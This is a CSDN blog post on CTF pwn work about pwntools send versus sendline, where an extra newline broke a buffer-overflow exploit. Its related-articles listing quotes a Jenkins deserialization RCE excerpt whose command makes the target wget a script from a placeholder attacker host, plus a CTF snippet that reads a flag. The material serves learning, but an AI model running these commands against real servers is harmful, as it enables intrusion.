pwn中send和sendline在攻击时的区别

于 2023-02-16 15:00:57 发布
阅读量445 收藏 1
点赞数
分类专栏: pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzucaicai/article/details/129062353
版权
在编写攻击脚本时遇到数据发送错误,通过debug发现read函数接收了额外的字节,原来是sendline发送了19个字节而非预期的18个,导致后续read被意外截断。修正为send后问题解决,强调了精确控制输入数据量的重要性。
摘要由CSDN通过智能技术生成

今天写了一个攻击脚本,发现哪都不对,调试半天也没找到原因,只知道数据一直发送错误。 于是在脚本加了个debug再继续调试,结果发现一个很淦的东西,尤其在栈溢出中确实是一个很需要注意的点 比如read(0, s, 0x18uLL),我只想让它读完0x18个数据后赶紧走人,于是我使用了io.sendline(b'a'*0x18) 于是就很淦了,它居然给我发了19个字节的数据。

 

巧合的是,这个read下面还有一个read,导致这个sendline多加的\n就读进了第二个read触发了截断,导致第二个read只读了一个'\n'就跑了,导致攻击一直都失败

 

于是把sendline改成了send后,一切变得十分自然

 

血的教训!

cccsl_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python sendline_Python模块Pexpect详解
weixin_31076517的博客
01-28 1797
运行环境:Python3.6Pexpect简介在讲解Pexpect之前,我们需要先了解一下Expect这个脚本语言,它是由TCL语言实现的,主要用于人机交互式对话的自动化控制,可以用来完成ssh、ftp、telnet等命令行程序的自动化交互。Pexpect其实就是一个用Python语言实现的类Expect功能的模块,通过它就可以在Python完成Expect所完成的功能。Pexpect的基本工作...
【逆向学习记录】Pwntool常用的数据处理方式
卦星的专栏
05-26 4286
1 概述 偶尔在pwn的题目,使用pwntool工具,由于不熟练,经常性遗忘,尤其是接收地址的候,会卡在数据处理上,因此单独起一篇文章,用来记录日常用到的各种问题。 参考文章: PwnTools常见用法 Pwntool 官方文档 2 数据处理方式 2.1 发送数据 send(payload) 发送payload sendline(payload) 发送payload,并进行换行(末尾\n) s...
pwntools常用脚本语句介绍讲解
半岛铁盒的博客
02-23 3029
接收远端传回的数据 interactive() : 在取得shell之后使用,直接进行交互,相当于回到shell的模式。 recv(numb=字节大小, timeout=default) : 接收指定字节数。 recvall() : 一直接收直到达到文件EOF。 recvline(keepends=True) : 接收一行,keepends为是否保留行尾的\n。 recvuntil(delims, drop=False) : 一直读到delims的pattern出现为止。 recvrepeat(timeou
spawn类sendline方法详解
maiziedu的博客
06-09 1335
    在spawn这个类,还有一个方法也就是“sendline”方法,用于像spawn类和运行的程序,发送子命令这个方法。     比如说我们在这个终端可以运行这么一个带有交互性命令的nslookup,用它可以用来查询百度的IP地址,最后访问exit就可以退出了,那么“www.baidu.com”就相当于nslookup的子命令,查询百度的IP地址,那么exit也是一个子命令,用于退...
PWN工具介绍
kelxLZ的博客
07-02 1078
Author:ZERO-A-ONE Date:2021-07-02 一、PWNTOOLS 1.1 程序的启动与远程连接 使用process接口启动程序 常用:process(argv,env),例如: process('./demo'):执行可执行文件demo process(['cat','flag]):执行命令cat flag process("./demo",env={'LD_PRELOAD':'./libc.so.6'}):以指定环境变量运行文件 当程序运行于远程,提供了Host和监.
PWN-学习笔记
小龙在线
08-23 723
原理 危险函数:gets scanf pwndbg Python2 安装 pip install pwntools apt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com
pwn题目的libc-2.27.so文件
04-11
pwn题,有些候题目不给这个文件,这里是这个库的文件。
电源技术的电感是PWN DC/DC转换器常用的元件
11-16
 电感是磁性元件,有磁饱和的问题:在应用,有允许其饱和的,有允许其从一定电流值起开始进入饱和的,有也有不允许其出现饱 和的,在具体的电路要注意这种区别。在多数情况下,电感工作在“线性区”,...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集在发现并利用浏览器的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
电源技术的电容是PWN DC/DC转换器常用的元件
11-16
在电源技术,电容是PWN DC/DC转换器不可或缺的元件,它与电感共同承担能量存储和传输的任务,但对频率响应的特性截然相反。电容的主要作用在于吸收纹波,平滑输出电压,从而确保电源的稳定。然而,实际应用的...
pwn_jenkins:有关攻击Jenkins服务器的注意事项
05-12
旧版Jenkins的反序列化RCE(CVE-2015-8103,Jenkins 1.638及更高版本) 使用生成有效负载。 然后使用RCE: java -jar ysoserial-master.jar CommonsCollections1 ' wget myip:myport -O /tmp/a.sh ' > payload....
Pwn基础知识笔记
3569
12-15 4603
http://www.jianshu.com/p/6e528b33e37a pwntools简单语法 作为最好用的pwn工具,简单记一下用法: 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制 IO模块:这个比较容易跟zio搞混,记住zio是re
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
ctf pwn 个人经验记录
jmp esp
05-22 8884
前言记录一下自己在做pwn的过程当学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
pwntools:类型转换
m0_53932372的博客
09-08 4889
byte和str 首先一定要注意,byte和str在python里面有明确的区分,尤其是在做pwn的题目,一定要注意这个问题。 参考链接:https://www.cnblogs.com/mlgjb/p/7899534.html hex hex(x) x -- 10进制整数 返回16进制数,以字符串形式表示。 p32、p64 p32(x) x-- 一个整型数据 返回byte型。 u32、u64 u32(x) x-- byte型 返回整型。 int类型转换 int(a,base=x)
攻防世界pwn新手区writeup
a370793934的专栏
11-27 1031
get_shell #coding = utf-8 from pwn import * context.log_level = 'debug' io = remote('111.198.29.45', 54766) io.sendline('ls') io.sendline('cat flag') io.interactive() flag: cyberpeace{c2b358...
i春秋上的几道pwn
sopora的博客
06-17 1730
01.pwnme-50: Tag: fmtstr任意读 / 整型溢出 / ret2csu_init #encoding:utf-8 from pwn import * #context.log_level = 'debug' def leak(addr): io.sendafter('>', '2') io.sendafter('username...
pie在pwn的应用
最新发布
07-11
pwn,PIE(Position Independent Executable)是一防御措施,增加二进制的安全性。PIE使得程序每次运行加载到内存的地址随机的,这样可以防止攻击者利用固定的内存布局来进行攻击PIE在pwn的应用主要为了防止缓冲区溢出攻击Buffer Overflow)和ROP(Return-Oriented Programming)等攻击手法。通过使用PIE,程序的函数地址和全局变量的地址都在每次运行随机化,使得攻击者很难确定具体的地址,而增加了攻击的难度。 在进行pwn挑战或漏洞利用,了解目标程序是否启用了PIE以及如何绕过PIE保护是非常重要的。通常,攻击者需要通过信息泄漏或其他漏洞来获取目标程序的地址信息,然后进行相应的攻击策略来绕过PIE保护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值